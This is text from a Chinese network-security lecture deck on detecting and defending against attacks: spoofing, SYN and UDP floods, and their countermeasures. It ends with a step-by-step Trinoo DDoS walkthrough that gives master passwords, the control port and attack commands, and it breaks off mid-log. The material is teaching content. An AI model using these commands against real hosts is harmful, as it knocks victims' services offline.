s07-流量内容监控-attack.ppt

网络攻击的检测和预防 第七章 目录 常见网络攻击的检测和预防 DoS攻击的防范 黑客攻击网络的一般过程 信息的收集 利用的公开协议或工具 TraceRoute程序 SNMP协议 DNS服务器 Whois协议 Ping实用程序 黑客攻击网络的一般过程 系统安全弱点的探测 主要探测的方式 自编程序 慢速扫描 体系结构探测 利用公开的工具软件 黑客攻击网络的一般过程 建立模拟环境，进行模拟攻击 根据前面两小点所得的信息 建立一个类似攻击对象的模拟环境 对此模拟目标进行一系列的攻击 黑客攻击网络的一般过程 具体实施网络攻击 根据前几步所获得的信息 结合自身的水平及经验总结相应的攻击方法 等待时机，以备实施真正的网络攻击 协议欺骗攻击及防范 源IP地址欺骗攻击 在路由器上的解决方法 防止源IP地址欺骗行为的措施 抛弃基于地址的信任策略 使用加密方法 进行包过滤 协议欺骗攻击及防范 源路由欺骗攻击 防范源路由欺骗攻击的措施 抛弃由外部网进来却声称是内部主机的报文 在路由器上关闭源路由 协议欺骗攻击及防范 拒绝服务攻击 防止拒绝服务攻击的措施 调整该网段路由器上的配置 强制系统对超时的Syn请求连接数据包复位 缩短超时常数和加长等候队列 在路由器的前端做必要的TCP拦截 关掉可能产生无限序列的服务 拒绝服务攻击 用超出被攻击目标处理能力的海量数据包消耗可用系统，带宽资源，致使网络服务瘫痪的一种攻击手段 两种使用较频繁的攻击形式 TCP-SYN flood 半开式连接攻击 UDP flood 拒绝服务攻击 拒绝服务攻击 UDP flood Udp在网络中的应用 如，DNS解析、realaudio实时音乐、网络管理、联网游戏等 基于udp的攻击种类 如，unix操作系统的echo,chargen. echo服务 拒绝服务攻击 Trinoo 是基于UDP flood的攻击软件 Trinoo攻击功能的实现 是通过三个模块付诸实施的 攻击守护进程 NS 攻击控制进程 MASTER 客户端 NETCAT，标准TELNET程序等 拒绝服务攻击及防范 六个trinoo可用命令 Mtimer Dos Mdie Mping Mdos msize 拒绝服务攻击 拒绝服务攻击 攻击的实例: 被攻击的目标主机victim IP为:5 ns被植入三台sun的主机里，他们的IP对应关系分别为 client1:1 client2:2 client3:3 master所在主机为masterhost:4 首先我们要启动各个进程，在client1，2，3上分别执行ns，启动攻击守护进程， 其次，在master所在主机启动master masterhost# ./master ?? gOrave (系统示输入密码，输入gOrave后master成功启动) trinoo v1.07d2+f3+c [Mar 20 2000:14:38:49] (连接成功) 拒绝服务攻击 在任意一台与网络连通的可使用telnet的设备上，执行 　　 telnet 4 27665 　　 Escape character is ^]. 　　 betaalmostdone (输入密码) 　　 trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/] 　　 trinoo (进入提示符) 　　 trinoo mping (我们首先来监测一下各个攻击守护进程是否成功启动) 　　 mping: Sending a PING to every Bcasts. 　　 trinoo PONG 1 Received from 1 　　 PONG 2 Received from 2 　　 PONG 3 Received from 3 (成功响应) 　　 trinoo mtimer 60 (设定攻击时间为60秒) 　　 mtimer: Setting timer on bcast to 60. 　　 trinoo dos 5 　　 DoS: Packeting 5...... 拒绝服务攻击 至此一次攻击结束，此时ping 5，会得到icmp不可到达反馈，目标主机此时与网络的正常连接已被破坏 拒绝服务攻击 由于目前版本的trinoo尚未采用IP地址欺骗，因此在被攻击的主机系统日志里我们可以看到如下纪录 　　 Mar 20 14:40:34 victim snmpXdmid: Will attempt to re-establish connection. 　　 Mar 20 14:40:35 victim snmpdx: error while receiving a pdu from 1.59841: The messa